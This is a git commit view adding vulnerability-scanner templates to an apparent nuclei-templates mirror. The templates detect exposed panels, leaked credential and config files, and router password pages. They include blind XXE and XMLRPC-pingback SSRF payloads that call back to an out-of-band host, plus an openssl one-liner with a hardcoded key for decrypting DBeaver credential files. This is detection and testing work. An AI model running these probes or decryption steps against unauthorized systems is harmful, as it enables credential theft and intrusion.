daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2426 from projectdiscovery/generic 

Templates by geeknik
patch-1
Prince Chaddha 2021-08-23 19:55:32 +05:30 committed by GitHub
parent d9ec41e2e5 b5ec33e4c0
commit 647d27925a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 407 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
exposed-panels/tectuus-scada-monitor.yaml Normal file
View File

@ -0,0 +1,24 @@
id: tectuus-scada-monitor
info:
name: Tectuus SCADA Monitor
author: geeknik
severity: info
reference: https://www.tectuus.mx/
tags: panel,tectuus,scada
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>SCADAmonitor</title>"
part: body

28
exposed-panels/tracer-sc-login.yaml Normal file
View File

@ -0,0 +1,28 @@
id: tracer-sc-login
info:
name: Tracer SC login panel
author: geeknik
severity: info
reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html
tags: tracer,trane,iot,panel
requests:
- method: GET
path:
- "{{BaseURL}}/hui/index.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Tracer SC</title>"
- type: word
part: header
words:
- "text/html"

33
exposures/apis/couchbase-buckets-api.yaml Normal file
View File

@ -0,0 +1,33 @@
id: couchbase-buckets-api
info:
name: Couchbase Buckets REST API - Unauthenticated
author: geeknik
severity: info
reference:
- https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html
- https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html
tags: exposure,couchbase
requests:
- method: GET
path:
- "{{BaseURL}}/pools/default/buckets"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"couchbase":'
- '"bucket":'
- '"data":'
condition: and
- type: word
part: header
words:
- 'application/json'

26
exposures/configs/dbeaver-credentials.yaml Normal file
View File

@ -0,0 +1,26 @@
id: dbeaver-credentials
info:
name: DBeaver Credential Exposure
author: geeknik
severity: info
tags: exposure,dbeaver
requests:
- method: GET
path:
- "{{BaseURL}}/.dbeaver/credentials-config.json"
# To decode the credentials file, use following command:
# openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
part: header

29
exposures/configs/firebase-config-exposure.yaml Normal file
View File

@ -0,0 +1,29 @@
id: firebase-config-exposure
info:
name: Firebase Config Exposure
author: geeknik
reference: https://github.com/firebase/firebaseui-web/blob/master/demo/public/sample-config.js
severity: high
tags: firebase,exposure,config
requests:
- method: GET
path:
- "{{BaseURL}}/public/config.js"
- "{{BaseURL}}/config.js"
matchers-condition: and
matchers:
- type: word
words:
- "apiKey:"
- "authDomain:"
- "databaseURL:"
- "storageBucket:"
condition: and
- type: status
status:
- 200

16
exposures/configs/zend-config-file.yaml
View File

@ -2,7 +2,7 @@ id: zend-config-file
info:
name: Zend Configuration File
author: pdteam
author: pdteam,geeknik
severity: high
tags: config,exposure,zend,php
@ -10,12 +10,26 @@ requests:
- method: GET
path:
- "{{BaseURL}}/application/configs/application.ini"
- "{{BaseURL}}/admin/configs/application.ini"
- "{{BaseURL}}/application.ini"
- "{{BaseURL}}/aplicacao/application/configs/application.ini"
- "{{BaseURL}}/cloudexp/application/configs/application.ini"
- "{{BaseURL}}/cms/application/configs/application.ini"
- "{{BaseURL}}/moto/application/configs/application.ini"
- "{{BaseURL}}/Partners/application/configs/application.ini"
- "{{BaseURL}}/radio/application/configs/application.ini"
- "{{BaseURL}}/seminovos/application/configs/application.ini"
- "{{BaseURL}}/shop/application/configs/application.ini"
- "{{BaseURL}}/site_cg/application/configs/application.ini"
- "{{BaseURL}}/slr/application/configs/application.ini"
matchers-condition: and
matchers:
- type: word
words:
- "resources.db.params.password"
- "resources.db.params.username"
condition: and
- type: word
words:

35
exposures/files/db-schema.yaml Normal file
View File

@ -0,0 +1,35 @@
id: db-schema
info:
name: Discover db schema files
author: geeknik
severity: info
description: This file is auto-generated from the current state of the database.
tags: exposure,backup
requests:
- method: GET
path:
- "{{BaseURL}}/db/schema.rb"
- "{{BaseURL}}/database/schema.rb"
- "{{BaseURL}}/schema.rb"
matchers-condition: and
matchers:
- type: word
words:
- "This file is auto-generated from the current state of the database."
- "ActiveRecord::Schema.define"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: version
part: body
regex:
- 'eRecord::Schema\.define\(version: ([0-9_]+)\) do'

28
exposures/logs/django-debug-exposure.yaml Normal file
View File

@ -0,0 +1,28 @@
id: django-debug-exposure
info:
name: Django Debug Exposure
author: geeknik
reference: https://twitter.com/Alra3ees/status/1397660633928286208
severity: high
tags: django,exposure
requests:
- method: POST
path:
- "{{BaseURL}}/admin/login/?next=/admin/"
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "DB_HOST"
- "DB_NAME"
- "DJANGO"
- "ADMIN_PASSWORD"
condition: and

32
exposures/tokens/docker/dockercfg-config.yaml Normal file
View File

@ -0,0 +1,32 @@
id: dockercfg-config
info:
name: Detect .dockercfg
author: geeknik
severity: high
description: Docker registry authentication data
tags: docker,exposure,config
requests:
- method: GET
path:
- "{{BaseURL}}/.dockercfg"
- "{{BaseURL}}/.docker/config.json"
matchers-condition: and
matchers:
- type: word
words:
- '"email":'
- '"auth":'
condition: and
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200

26
vulnerabilities/generic/generic-blind-xxe.yaml Normal file
View File

@ -0,0 +1,26 @@
id: generic-blind-xxe
info:
name: Generic Blind XXE
author: geeknik
severity: high
tags: xxe,generic
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: {{BaseURL}}
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
<foo>&e1;</foo>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

31
vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml Normal file
View File

@ -0,0 +1,31 @@
id: xmlrpc-pingback-ssrf
info:
name: XMLRPC Pingback SSRF
author: geeknik
reference: https://hackerone.com/reports/406387
severity: high
tags: ssrf,generic
requests:
- raw:
- |
POST /xmlrpc/pingback HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>http://{{interactsh-url}}</value>
</param>
</params>
</methodCall>
matchers:
- type: word
part: interactsh-protocol
words:
- "http"

26
vulnerabilities/other/comtrend-password-exposure.yaml Normal file
View File

@ -0,0 +1,26 @@
id: comtrend-passsword-exposure
info:
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
author: geeknik
severity: high
reference: https://www.exploit-db.com/exploits/16275
tags: router,exposure,iot
requests:
- method: GET
path:
- "{{BaseURL}}/password.cgi"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "pwdAdmin ="
- "pwdSupport ="
- "pwdUser ="
condition: and

42
vulnerabilities/other/netgear-router-exposure.yaml Normal file
View File

@ -0,0 +1,42 @@
id: netgear-router-exposure
info:
name: Netgear Router S/N Disclosure
description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled.
reference:
- https://www.exploit-db.com/exploits/47117
- https://www.exploit-db.com/exploits/45741
author: geeknik
severity: critical
tags: netgear,exposure,iot
requests:
- method: GET
path:
- "{{BaseURL}}/rootDesc.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- 501
condition: or
- type: word
words:
- "<serialNumber>"
- "<deviceType>"
- "<modelNumber>"
condition: and
- type: word
part: header
words:
- text/xml
extractors:
- type: regex
group: 1
regex:
- "<serialNumber>([A-Z0-9]+)<\\/serialNumber>"

32
vulnerabilities/other/solar-log-authbypass.yaml Normal file
View File

@ -0,0 +1,32 @@
id: solar-log-authbypass
info:
name: Solar-Log 500 2.8.2 - Incorrect Access Control
author: geeknik
severity: high
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
reference: https://www.exploit-db.com/exploits/49986
tags: solarlog,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/lan.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "IPC@CHIP"
- type: word
part: body
words:
- " Solare Datensysteme GmbH"
- "mailto:info@solar-log.com"
condition: and